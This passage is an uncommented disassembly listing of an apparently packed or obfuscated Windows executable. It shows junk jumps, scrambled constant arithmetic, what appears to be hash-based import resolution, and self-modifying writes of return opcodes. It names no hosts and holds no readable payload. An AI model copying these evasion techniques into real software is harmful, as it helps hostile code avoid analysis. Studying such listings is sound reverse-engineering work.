loc_456A64:				; CODE XREF: sub_44626D+12j
		xor	eax, 86B570E1h
		call	sub_442C3E
		mov	ds:dword_41E194, eax
		lea	eax, nullsub_277
		jmp	loc_45AF99
; END OF FUNCTION CHUNK	FOR sub_44626D
; ---------------------------------------------------------------------------
		push	991590FCh
		jns	loc_457BBB
		jmp	sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_456A90:				; CODE XREF: sub_45689F-15081j
		add	esi, 9B387150h
		jmp	loc_443A57
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_456A9B:				; CODE XREF: sub_442938-258Cj
		jz	loc_44A130
		jmp	loc_44567B
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_456AA6:				; CODE XREF: sub_44BD20-E46Fj
		cmp	ebp, 88AC1435h
		jmp	loc_44B38A
; END OF FUNCTION CHUNK	FOR sub_44BD20
; ---------------------------------------------------------------------------
		push	ebx
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_456AB2:				; CODE XREF: sub_44CC31:loc_44CF56j
		push	7E51EBE3h
		pop	ebx
		rol	ebx, 5
		jmp	loc_43DB52
; END OF FUNCTION CHUNK	FOR sub_44CC31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_456AC0:				; CODE XREF: sub_446861-1E68j
		mov	eax, [eax]
		add	eax, [ebp-4]
		call	sub_441856
		cmp	eax, [ebp-8]
		jnz	loc_45819F
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		jmp	loc_442C71
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4415B8

loc_456ADE:				; CODE XREF: sub_4415B8+26D5j
		xor	eax, 45E59944h
		add	eax, 14CBEDF0h
		xchg	eax, [esp+8+var_8]
		jmp	loc_454BF7
; END OF FUNCTION CHUNK	FOR sub_4415B8
; ---------------------------------------------------------------------------

loc_456AF2:				; CODE XREF: y2kk37jd:loc_457F07j
		xchg	eax, [esp]
		push	0AF996725h
		pop	ecx
		rol	ecx, 3
		jmp	loc_451A11
; ---------------------------------------------------------------------------

loc_456B03:				; CODE XREF: y2kk37jd:00459868j
		pushf
		push	1CFA767Eh
		pop	edi
		rol	edi, 1Dh
		jmp	loc_4432B8
; ---------------------------------------------------------------------------
		jle	loc_43DC41
		jmp	sub_43E658
; ---------------------------------------------------------------------------

loc_456B1D:				; CODE XREF: y2kk37jd:0043DB24j
		pushf
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_456B1E:				; CODE XREF: sub_454D0F:loc_43DB16j
		add	esi, 29755A79h
		xor	esi, 51B406EFh
		xor	eax, esi
		jmp	loc_4572DB
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44023C

loc_456B31:				; CODE XREF: sub_44023C:loc_442391j
		pop	edx
		add	edx, 0DC384DD1h
		sub	edx, 9181F1EFh
		add	edx, 91DDDA6Ch
		rol	edx, 3
		xor	edx, 3983F929h
		xchg	edx, [esp+30h+var_30]
		jmp	loc_44DF00
; END OF FUNCTION CHUNK	FOR sub_44023C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4449BB

loc_456B55:				; CODE XREF: sub_4449BB:loc_43E316j
		add	eax, 2A1B2372h
		call	sub_442C3E
		mov	ds:dword_41E128, eax
		lea	eax, nullsub_18
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_18
; END OF FUNCTION CHUNK	FOR sub_4449BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EDF8

loc_456B74:				; CODE XREF: sub_44EDF8+5j
		mov	eax, [esp+0]
		push	edx
		jmp	loc_4459D8
; END OF FUNCTION CHUNK	FOR sub_44EDF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_456B7D:				; CODE XREF: sub_44CC31-C7C4j
		mov	ebp, ecx

loc_456B7F:				; CODE XREF: sub_44CC31:loc_44045Ej
		add	ecx, 363BA0C5h
		xchg	ecx, [esp+0]
		jmp	loc_4435A6
; END OF FUNCTION CHUNK	FOR sub_44CC31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_456B8D:				; CODE XREF: sub_4448E2-1507j
		jbe	loc_45A6EF
		add	ebp, edi
		mov	esi, 9DFC1158h
		xchg	ebx, edx
		jmp	loc_45185C
; END OF FUNCTION CHUNK	FOR sub_4448E2

; =============== S U B	R O U T	I N E =======================================



sub_456BA1	proc near		; DATA XREF: sub_43C851+B49Do
		popf
		push	offset loc_4454E8
		jmp	nullsub_280
sub_456BA1	endp


; =============== S U B	R O U T	I N E =======================================



sub_456BAC	proc near		; CODE XREF: sub_445226:loc_452595p
					; y2kk37jd:004528CEj

; FUNCTION CHUNK AT 0044115D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443820 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445881 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00455C9C SIZE 00000009 BYTES

		xchg	esi, [esp+0]
		pop	esi
		lea	eax, [ebp-14h]
		push	eax
		call	sub_4476EE

loc_456BB9:				; CODE XREF: y2kk37jd:0045C399j
		push	ecx
		jmp	loc_44115D
sub_456BAC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C55

loc_456BBF:				; CODE XREF: sub_455C55:loc_4478C6j
		add	ebx, 6D6A67D4h
		xchg	ebx, [esp+4+var_4]
		jmp	sub_446183
; END OF FUNCTION CHUNK	FOR sub_455C55

; =============== S U B	R O U T	I N E =======================================



sub_456BCD	proc near		; CODE XREF: y2kk37jd:0043F08Fj
					; y2kk37jd:0044EF47p

; FUNCTION CHUNK AT 00445A6A SIZE 00000019 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_43C326
		push	0D78DFC5Eh
		pop	eax
		rol	eax, 10h
		xor	eax, 488523FFh
		add	eax, 0F2C85911h
		jmp	loc_445A6A
sub_456BCD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_456BF0:				; DATA XREF: sub_44C304-EB7Eo
		push	eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_456BF2:				; CODE XREF: sub_43C851+177C7j
		jmp	nullsub_193
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------

loc_456BF7:				; CODE XREF: y2kk37jd:00441CB2j
		call	sub_44DAE1
		call	sub_442376
; START	OF FUNCTION CHUNK FOR sub_4490CB

loc_456C01:				; CODE XREF: sub_4490CB+11594j
		jmp	loc_44F381
; END OF FUNCTION CHUNK	FOR sub_4490CB
; ---------------------------------------------------------------------------

loc_456C06:				; CODE XREF: y2kk37jd:0045267Cj
		jmp	loc_45C674
; ---------------------------------------------------------------------------

loc_456C0B:				; CODE XREF: y2kk37jd:0045A281j
		xchg	eax, [esp]
		mov	ebp, eax
		call	sub_44C57A
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_456C15:				; CODE XREF: sub_4458DD+F043j
		mov	edi, [eax]

loc_456C17:				; CODE XREF: sub_44AA4A:loc_45830Dj
		call	sub_446183
		push	53E99B3Ah
		pop	edx
		sub	edx, 700F4184h
		and	edx, 0CD6A1AB3h
		jmp	loc_446762
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------

loc_456C33:				; DATA XREF: sub_44F1E2-FDF9o
		mov	eax, [ebp+8]
		test	byte ptr [eax-8], 10h
		jz	loc_4564FB
		inc	dword ptr [ebp-8]

loc_456C43:				; CODE XREF: y2kk37jd:0045650Cj
					; y2kk37jd:00456515j
		mov	eax, [ebp-8]
		pop	ecx
		call	sub_43FCBA
; START	OF FUNCTION CHUNK FOR sub_4487FD

loc_456C4C:				; CODE XREF: sub_4487FD+FC69j
		jmp	loc_459017
; END OF FUNCTION CHUNK	FOR sub_4487FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4532F4

loc_456C51:				; CODE XREF: sub_4532F4+1Cj
		jmp	locret_4572D5
; END OF FUNCTION CHUNK	FOR sub_4532F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_456C56:				; CODE XREF: sub_4514DE-C720j
		jmp	loc_45666D
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_456C5B:				; CODE XREF: sub_44610D-2AE6j
		jmp	loc_4575C4
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45877C

loc_456C60:				; CODE XREF: sub_45877C+Ej
		jz	sub_44023C
		jmp	loc_44AFB0
; END OF FUNCTION CHUNK	FOR sub_45877C
; ---------------------------------------------------------------------------
		xor	eax, 787C63C5h
; START	OF FUNCTION CHUNK FOR sub_445226

loc_456C71:				; CODE XREF: sub_445226+9Cj
		rol	eax, 1Fh
		push	edx
		call	sub_448F60
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_447E3E

loc_456C7A:				; CODE XREF: sub_43F0A5:loc_44FA27j
					; sub_447E3E+A5C4j
		push	offset sub_450F17
		jmp	loc_44AFCE
; END OF FUNCTION CHUNK	FOR sub_447E3E
; ---------------------------------------------------------------------------

loc_456C84:				; CODE XREF: y2kk37jd:0045726Fj
		and	eax, 736F0547h
		or	eax, 0B86E05A0h
		xor	eax, 2BA50AB0h
		call	sub_442C3E
		mov	ds:dword_41E134, eax
		lea	eax, nullsub_457
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_457
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_456CAF:				; CODE XREF: sub_456A36+4D4j
		xchg	eax, ebp

loc_456CB1:				; CODE XREF: sub_456A36:loc_445634j
		call	sub_449F5B
; ---------------------------------------------------------------------------

loc_456CB6:				; CODE XREF: y2kk37jd:0043FDD1j
		jmp	sub_43EE8A
; END OF FUNCTION CHUNK	FOR sub_456A36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448F60

loc_456CBB:				; CODE XREF: sub_448F60:loc_43DD87j
		jz	loc_44B3A7
; END OF FUNCTION CHUNK	FOR sub_448F60
; START	OF FUNCTION CHUNK FOR sub_455DD8

loc_456CC1:				; CODE XREF: sub_455DD8+1j
		jmp	loc_43DC07
; END OF FUNCTION CHUNK	FOR sub_455DD8
; ---------------------------------------------------------------------------
		xchg	ebp, [edx]
		jmp	loc_44B3A6
; ---------------------------------------------------------------------------

locret_456CCD:				; CODE XREF: y2kk37jd:0043C0D9j
		retn
; ---------------------------------------------------------------------------

loc_456CCE:				; CODE XREF: y2kk37jd:00446D39j
		jmp	loc_448391
; ---------------------------------------------------------------------------

loc_456CD3:				; CODE XREF: y2kk37jd:0044396Bj
		jmp	loc_4422AC

; =============== S U B	R O U T	I N E =======================================



sub_456CD8	proc near		; CODE XREF: y2kk37jd:00442038j
					; sub_456949:loc_45694Ep
		xchg	edx, [esp+0]
		pop	edx
		lea	eax, [ebp-100h]
		push	eax
		push	offset loc_442A1C
		jmp	nullsub_460
sub_456CD8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFAE

loc_456CED:				; CODE XREF: sub_43BFAE+111C2j
		or	ebp, edi

loc_456CEF:				; CODE XREF: sub_43BFAE:loc_44D162j
		xor	esi, 8A7FE949h
		sub	esi, 0D08838A9h
		xor	esi, 3AD5556Fh
		add	esi, 4512C1F7h
		add	esi, ebp
		add	esi, 0B7DBB60Eh
		jmp	loc_4560D3
; END OF FUNCTION CHUNK	FOR sub_43BFAE
; ---------------------------------------------------------------------------

loc_456D14:				; CODE XREF: y2kk37jd:0044F177j
		test	esi, ebp
		jmp	loc_4442BF
; ---------------------------------------------------------------------------

loc_456D1B:				; CODE XREF: y2kk37jd:loc_44C150j
		pop	edx
		mov	eax, [eax]
		add	eax, [ebp-4]
		add	eax, 18h
		push	offset sub_44D006
		jmp	locret_445D8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_456D2E:				; CODE XREF: sub_445226-70FDj
		add	ecx, 7F7C1B20h
		test	ecx, 10000000h
		jmp	loc_4500E8
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_456D3F	proc near		; CODE XREF: sub_451634:loc_4526CDj
					; sub_452A89+9985p

; FUNCTION CHUNK AT 004448AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A740 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044C65A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EB2E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00450761 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453AA7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00454295 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0045429C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A324 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B08A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B5F2 SIZE 00000019 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		jnz	loc_45429C

loc_456D49:				; CODE XREF: sub_44B924-102CFj
					; sub_44B924-D6AEj ...
		pop	ecx
		pop	ecx
		jmp	loc_454295
sub_456D3F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E8DA

loc_456D50:				; CODE XREF: sub_43E8DA+8130j
		xchg	esi, [esp+8+var_8]
		jmp	loc_440308
; END OF FUNCTION CHUNK	FOR sub_43E8DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_456D58:				; CODE XREF: sub_43C865+B939j
		jz	loc_448D38
		jmp	loc_45584C
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_456D63:				; CODE XREF: y2kk37jd:loc_44E14Aj
		add	edx, 26A10F57h
		cmp	edx, 67F3ED6Bh
		jmp	loc_44703C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C11

loc_456D74:				; CODE XREF: sub_448C11:loc_448C16j
		adc	esi, eax
		jnp	sub_43F3BF
		add	esi, 0BD133663h
		add	eax, edx
		jmp	loc_4489AB
; END OF FUNCTION CHUNK	FOR sub_448C11
; ---------------------------------------------------------------------------

loc_456D89:				; CODE XREF: y2kk37jd:loc_4501ECj
		push	eax
		push	0E22B7951h
		add	eax, 3A80073Eh
		jmp	loc_44C6F4
; ---------------------------------------------------------------------------

loc_456D9A:				; DATA XREF: sub_43ED19:loc_4585AAo
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4513CE
		jmp	loc_45A471
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_456DAB:				; CODE XREF: sub_448CAE-B917j
		jl	loc_4523D9

loc_456DB1:				; CODE XREF: sub_43E575+9j
		jmp	loc_45A1CE
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
		and	edi, 0E2A62683h
		cmp	ebp, esi
		jmp	loc_446E68
; ---------------------------------------------------------------------------

loc_456DC3:				; DATA XREF: sub_43F5BD+DDC8o
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_4422C8
		jmp	loc_453EC9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_219. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44472C

loc_456DD3:				; CODE XREF: sub_44472C-3421j
		jmp	nullsub_454
; END OF FUNCTION CHUNK	FOR sub_44472C
; ---------------------------------------------------------------------------
		add	edx, edi
		popf
		jmp	sub_43B882
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_150. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_456DE1:				; CODE XREF: sub_44CEAB+81F5j
		jmp	loc_43B0E7
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------
		mov	edx, [ecx]
		jmp	sub_456F5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_456DED:				; CODE XREF: sub_4554E9:loc_448D1Dj
		xor	ecx, 0FA169DE5h
		rol	ecx, 1Dh
		xor	ecx, 0B2F493C2h
		cmp	edx, ecx
		pop	ecx
		rol	eax, 0Dh
		pop	eax
		jmp	loc_443DC6
; END OF FUNCTION CHUNK	FOR sub_4554E9
; ---------------------------------------------------------------------------

loc_456E08:				; CODE XREF: y2kk37jd:0043CCB1j
		call	sub_44C79E

loc_456E0D:				; CODE XREF: y2kk37jd:0045011Aj
		jmp	loc_455172
; ---------------------------------------------------------------------------

loc_456E12:				; DATA XREF: sub_43D005+11453o
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		push	ebx
		push	9512C48Ah
		jmp	loc_45A8B3
; ---------------------------------------------------------------------------

loc_456E23:				; CODE XREF: y2kk37jd:0044ADECj
		cmp	ds:dword_44D2B4, 0
		jnz	loc_44DD04
		jmp	loc_440B8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_456E35:				; CODE XREF: sub_4514DE-DA4Dj
		add	ecx, 0C08A2619h
		and	ecx, 1BFD673Ah
		sub	ecx, 0A8B0276Ah
		add	ecx, 0A7280A5Ch
		xchg	ecx, [esp+10h+var_10]
		jmp	loc_44733C
; END OF FUNCTION CHUNK	FOR sub_4514DE

; =============== S U B	R O U T	I N E =======================================



sub_456E55	proc near		; DATA XREF: sub_44E7AF+Ao
		xchg	ecx, [esp+0]
		jmp	sub_446183
sub_456E55	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_456E5D:				; CODE XREF: sub_445787:loc_452B9Ej
		and	ecx, ebx
		mov	eax, edi
		jmp	loc_448EA1
; END OF FUNCTION CHUNK	FOR sub_445787
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_313. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_456E67:				; CODE XREF: sub_4448E2+6905j
		jmp	loc_453366
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_456E6C:				; CODE XREF: sub_44B814+FE60j
		jo	loc_44DDDA
		adc	eax, 8008BDF4h

loc_456E78:				; CODE XREF: sub_44B814:loc_44F838j
					; y2kk37jd:00454F65j
		mov	eax, 0E1h
		push	edi
		call	sub_458F91

loc_456E83:				; CODE XREF: sub_457AA8-3BE4j
		jmp	loc_45A598
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------

loc_456E88:				; CODE XREF: y2kk37jd:00443A7Bj
		sbb	ecx, ebp
; START	OF FUNCTION CHUNK FOR sub_453867

loc_456E8A:				; CODE XREF: sub_453867:loc_443A64j
		add	eax, 2D4347Ah
		mov	eax, [eax]
		call	sub_43EF4F

loc_456E97:				; CODE XREF: y2kk37jd:00440A70j
		jmp	loc_450DA0
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_456E9C:				; CODE XREF: sub_44B924+36F4j
					; sub_44B924+884Aj ...
		jnz	loc_44DFDF
		mov	eax, [ebp-4]
		call	sub_45B019
		mov	[ebp-8], eax
		jmp	loc_44DFC9
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_456EB2:				; CODE XREF: sub_44C304-82BEj
		pushf

loc_456EB3:				; CODE XREF: sub_44C304:loc_45AA9Fj
		call	sub_447977
		push	0DD4148FEh
		pop	edx
		and	edx, ds:4000EAh
		or	edx, 8ECAD925h
		xor	edx, 0A30E5B3Eh
		jmp	loc_445DCA
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450B30

loc_456ED5:				; CODE XREF: sub_450B30+Fj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_43F311
; END OF FUNCTION CHUNK	FOR sub_450B30
; ---------------------------------------------------------------------------
		adc	ebx, eax
		jmp	loc_44107C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_456EEA:				; CODE XREF: sub_446718:loc_4510D1j
		jge	loc_45410B
		and	edi, 274C109Ch
		test	ebx, esi
		jmp	loc_454105
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_456EFD:				; CODE XREF: sub_456A36-113FCj
		ja	loc_450363
		jnz	sub_442938
		pushf
		jmp	loc_456CAF
; END OF FUNCTION CHUNK	FOR sub_456A36

; =============== S U B	R O U T	I N E =======================================



sub_456F0F	proc near		; CODE XREF: sub_4504DD-DD1Dp
					; y2kk37jd:00447F55j

; FUNCTION CHUNK AT 0043F99C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C654 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_455BE9
		mov	eax, 0D53D974Bh
		call	sub_442C3E
		mov	ds:off_41E064, eax
		lea	eax, loc_457B27
		jmp	loc_43F99C
sub_456F0F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B84

loc_456F33:				; CODE XREF: sub_454B84-872Dj
		push	edx
		call	sub_459F8F
		mov	eax, 0EEE68DF1h
		push	ebx
		push	1ECC685Bh
		adc	ebx, 0D691CA5Ah
		jmp	loc_444D7B
; END OF FUNCTION CHUNK	FOR sub_454B84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FC0

loc_456F4F:				; CODE XREF: sub_458FC0:loc_4415D9j
		jz	loc_4568D6
		jmp	loc_43B53B
; END OF FUNCTION CHUNK	FOR sub_458FC0

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_456F5A	proc near		; CODE XREF: sub_449F5B+F8ECj
		retn
sub_456F5A	endp


; =============== S U B	R O U T	I N E =======================================



sub_456F5B	proc near		; CODE XREF: y2kk37jd:00445BAEp
					; y2kk37jd:00456DE8j

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	ecx, [esp-4+arg_0]
		mov	eax, edx
		call	sub_4448E2
		jmp	loc_44DE29
sub_456F5B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_456F6E:				; CODE XREF: y2kk37jd:00448A34j
		xchg	edx, [esp]
		mov	edi, edx
		pop	edx
		and	edi, 93700088h
		or	edi, 0B79C6887h
		jmp	loc_43BBBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_456F85:				; CODE XREF: sub_4411C3-B61j
		ja	loc_440196
		shr	esi, 0Fh
		jmp	loc_458A4A
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_456F93:				; CODE XREF: sub_4492F7:loc_44719Ej
		cmp	dword ptr [ebp-8], 0
		jz	loc_45929D
; END OF FUNCTION CHUNK	FOR sub_4492F7
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_456F9D:				; CODE XREF: sub_44D302+Aj
					; y2kk37jd:00459297j
		jb	loc_452467
		cmp	dword ptr [ebp-1Ch], 0Fh
		jnz	loc_443493
		mov	eax, [ebp-1Ch]
		push	offset sub_4514CE
		jmp	locret_45B80C
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------

loc_456FBA:				; CODE XREF: y2kk37jd:00457144j
		jns	sub_43F811

; =============== S U B	R O U T	I N E =======================================



sub_456FC0	proc near		; CODE XREF: sub_458520+8p
		xchg	edx, [esp+0]
		pop	edx
		add	eax, 2D55873Ch
		mov	eax, [eax]
		mov	byte ptr [eax],	6Ch
		jmp	loc_447AEA
sub_456FC0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_456FD4:				; CODE XREF: sub_4440AB+8DFAj
		jb	loc_4459DD

loc_456FDA:				; CODE XREF: sub_4440AB:loc_459EDFj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_448350
		jmp	loc_440990
; END OF FUNCTION CHUNK	FOR sub_4440AB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_456FEC:				; CODE XREF: sub_45B7AA-1AE42j
		jmp	loc_44E77E
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_456FF1:				; CODE XREF: sub_453867-15561j
		jmp	loc_4488FC
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_456FF6:				; CODE XREF: y2kk37jd:0045A954j
		mov	esi, 69C77D41h

; =============== S U B	R O U T	I N E =======================================



sub_456FFB	proc near		; CODE XREF: sub_43B8D6+9p

; FUNCTION CHUNK AT 0044ABF8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045259F SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ecx
		mov	ecx, edi
		xchg	ecx, [esp+0]
		push	1F60BE5Dh
		pop	edi
		jmp	loc_45259F
sub_456FFB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458CC4

loc_457010:				; CODE XREF: sub_458CC4:loc_448301j
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_458CC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_457012:				; CODE XREF: sub_44F641+741Ej
		jmp	loc_43D3DC
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_457017:				; CODE XREF: sub_43C851+A3A4j
		rol	eax, 0Eh
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_45701C:				; CODE XREF: sub_44DBF8+A65j
		jmp	loc_45B459
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457021:				; CODE XREF: sub_445226-85B8j
		jmp	loc_4569B8
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_457026	proc near		; CODE XREF: sub_458681-3B7Ej

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044C41E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004529CB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459D04 SIZE 0000000C BYTES

		push	ebp
		jmp	loc_4529CB
sub_457026	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_45702C:				; CODE XREF: sub_44DBF8-EDA5j
		xchg	edi, [esp+4+var_4]
		push	40h
		lea	eax, [ebp-64h]
		push	eax
		push	400000h
		jmp	loc_453CD9
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------

loc_45703F:				; CODE XREF: y2kk37jd:00457A3Bj
		retn
; ---------------------------------------------------------------------------

loc_457040:				; CODE XREF: y2kk37jd:0045A227j
		xchg	eax, [edi]

; =============== S U B	R O U T	I N E =======================================



sub_457042	proc near		; CODE XREF: sub_440337-2CEAp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D4BE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AB44 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00454824 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00457ECC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B4DE SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	ecx, [esp+0]
		jmp	loc_457ECC
sub_457042	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45704E	proc near		; CODE XREF: sub_459789+7p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044BD71 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D49D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045994B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B408 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		jmp	loc_44BD71
sub_45704E	endp


; =============== S U B	R O U T	I N E =======================================



sub_45705C	proc near		; DATA XREF: sub_4581BB+3o
		jno	sub_457F67
		call	sub_45219E
sub_45705C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44866D

